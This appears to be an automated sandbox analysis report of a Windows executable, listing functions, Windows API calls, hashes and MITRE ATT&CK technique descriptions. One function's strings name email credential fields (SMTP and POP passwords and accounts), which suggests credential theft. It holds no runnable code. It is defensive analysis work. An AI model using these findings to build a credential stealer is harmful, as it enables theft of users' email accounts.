API String ID: 4139908857-0
Opcode ID: b2e8b6773507cdf7231c77eae61141d4b8ec0bac9ed43eca3cc884de126d2819
Instruction ID: 55a855e60d0e26e9cefe3805f6050fce604063d03f7512b2506b91c1ccc212cb
Opcode Fuzzy Hash: b2e8b6773507cdf7231c77eae61141d4b8ec0bac9ed43eca3cc884de126d2819
Instruction Fuzzy Hash: 1811DFB6C002498FCB20DFAAD444B9EFBF4EB88314F10845AD529A7350D379A645CFA1

Function 08104458 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0810AC55

Memory Dump Source

Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 05fcc4fa33ad85f3a25bda16b39a0276552185ab278ce83e7494317dc8a767bc
Instruction ID: 2a5336676104b7ba51f8a64c9278229e2ad17a447cf41ca4eb34ed3842b73d4b
Opcode Fuzzy Hash: 05fcc4fa33ad85f3a25bda16b39a0276552185ab278ce83e7494317dc8a767bc
Instruction Fuzzy Hash: 9511F5B58003499FDB10DF9AC944BDEBBF8EF48310F108419E558A7240C375A984CFA5

Function 0810ABF4 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0810AC55

Memory Dump Source

Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: be51e8d4e9e396c411c649375c3e7220d8a42a28eec7fe34620ea9845d508026
Instruction ID: 3ee1056ed1de5ad5d22fb0bd82a7a1f7533a6111d78a75ac951bf3ea75f66fd5
Opcode Fuzzy Hash: be51e8d4e9e396c411c649375c3e7220d8a42a28eec7fe34620ea9845d508026
Instruction Fuzzy Hash: 0B11D3B58003499FDB10DF9AD985BDEBBF8FF48314F10841AE558A7250C379A984CFA5

Function 00ADD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2128168947.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_add000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a96e206dfdfe44b44f34224f29022359785f466d984ca0ce4753ebaa2bc24756
Instruction ID: 89f1c9f773f824fb727365406d6684416dc7cb41250c64b83e48555c4e508cb2
Opcode Fuzzy Hash: a96e206dfdfe44b44f34224f29022359785f466d984ca0ce4753ebaa2bc24756
Instruction Fuzzy Hash: 3C2125B1540240EFCB15DF14E9C0F26BF65FB98318F20C56AE90A0B356C33AD816DBA2

Function 00ADD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2128168947.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_add000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c086e7a91c990e5c4d725428124fbaa94825de51c560710333081f926522e5a
Instruction ID: a87d3e467389f9ddfc472714f68dc6a3221d03beac303b70c5298a88499ce1bf
Opcode Fuzzy Hash: 0c086e7a91c990e5c4d725428124fbaa94825de51c560710333081f926522e5a
Instruction Fuzzy Hash: C62128B1500204DFDB15DF14D9C0F26BF65FB98324F20C56AD90A0B356C33AE856D7A2

Function 00AFD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2128356843.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_afd000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcca7fe489fcbdc66245249c8778f88b18e5e3c297868633c5918c0ce5471f2b
Instruction ID: fbb4ece8f873ec8b8ad0a2ad2848689d64909036d96f8a747d05067841c0a48a
Opcode Fuzzy Hash: bcca7fe489fcbdc66245249c8778f88b18e5e3c297868633c5918c0ce5471f2b
Instruction Fuzzy Hash: 0821F571504208DFDB16DF64D584B26BF66FB84314F20C569EA4A4B356CB3AD807CA61

Function 00AFD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2128356843.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_afd000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb72f0cc2546d528384fc04b76b2791397e44d1d1286ab858baf41837cdf5435
Instruction ID: dde1be306138402fc974b33f4f13e9653e83a9b44171a5251548816ba78306d1
Opcode Fuzzy Hash: fb72f0cc2546d528384fc04b76b2791397e44d1d1286ab858baf41837cdf5435
Instruction Fuzzy Hash: 00210771504208EFDB06DF94D5C0F36BB66FB84314F20C56DEA094B256C33AD806DAA1

Function 00AFD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2128356843.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_afd000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f23b7a0c920e4d4bac6c281eecb183f18926601615de5883e790be2dbea25b79
Instruction ID: b04aefa1666cb7ed3193413b62df023798e7497404d10c178fce7972c7d2655d
Opcode Fuzzy Hash: f23b7a0c920e4d4bac6c281eecb183f18926601615de5883e790be2dbea25b79
Instruction Fuzzy Hash: 5E2180755093848FCB03CF24D994715BF72EB46314F28C5EAD9498B6A7C33A980ACB62

Function 00ADD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2128168947.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_add000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 59d8ea48935b4c508cdf81c57289fb704efb57789b39b6e1ebb4a2e951b22936
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: A511E676504280DFCB16CF14D5C4B16BF71FB98314F24C6AAD94A0B756C336D85ACBA2

Function 00ADD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2128168947.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_add000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 7bd7197abad08d47a08a7d2de32f7cff2893cfac128d8aa872274bb3702f1010
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 431126B2404240DFCB12CF00D5C4B16BF71FB94324F24C6AAD90A0B356C33AE85ACBA2

Function 00AFD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2128356843.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_afd000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 3fe7a7da3a617e116619e13f9e1df58add717d0397b9e64f9960318ab5dca680
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 1A11BB75504284DFCB02CF50C5C4B25BBA2FB84314F24C6AAE9494B296C33AD80ACBA2

Function 00ADD745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2128168947.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_add000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98c939eb243d02b68bbb0cfca830282414c91502363cc3ab63b7a0cbceefbdb2
Instruction ID: 2a32ade46e556b8036ce66b6a2420a19eeae96d3778ce6b610acb464648cf7c9
Opcode Fuzzy Hash: 98c939eb243d02b68bbb0cfca830282414c91502363cc3ab63b7a0cbceefbdb2
Instruction Fuzzy Hash: 840126310043409AE7208F29CD84B67BFECEF56320F18C5ABED1A0E386C2399C00CAB1

Function 00ADD744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2128168947.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_add000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66298ee4142a61e9503a7216da20b8afc84e7682d7c53abb87d5a83f926de5e9
Instruction ID: 0f2ba95f120c402bc5c9a3a52fa7bfb3b908c05b05b852ef01a4750ae271980c
Opcode Fuzzy Hash: 66298ee4142a61e9503a7216da20b8afc84e7682d7c53abb87d5a83f926de5e9
Instruction Fuzzy Hash: 2EF062724043449AE7208F16CC88B62FFD8EF56734F18C45AED494E386C2799C44CAB1

Analysis Process: ZeJFfrYmOnJKS.exePID: 6400, Parent PID: 1436COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	302
Total number of Limit Nodes:	13

Executed Functions

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00413A3F Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54

Memory Dump Source

Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

SmtpPassword, xrefs: 0040D117
PopPassword, xrefs: 0040D0D0
Technology, xrefs: 0040D08D
SmtpAccount, xrefs: 0040D0FA
PopAccount, xrefs: 0040D0B6
SmtpServer, xrefs: 0040D0DC
SmtpPort, xrefs: 0040D0EB
EmailAddress, xrefs: 0040D074
PopServer, xrefs: 0040D099
PopPort, xrefs: 0040D0A7

Memory Dump Source

Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 00402B7C Relevance: 2.5, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Function 004061C3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorLast
String ID: IDA$IDA
API String ID: 887189805-2020647798
Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

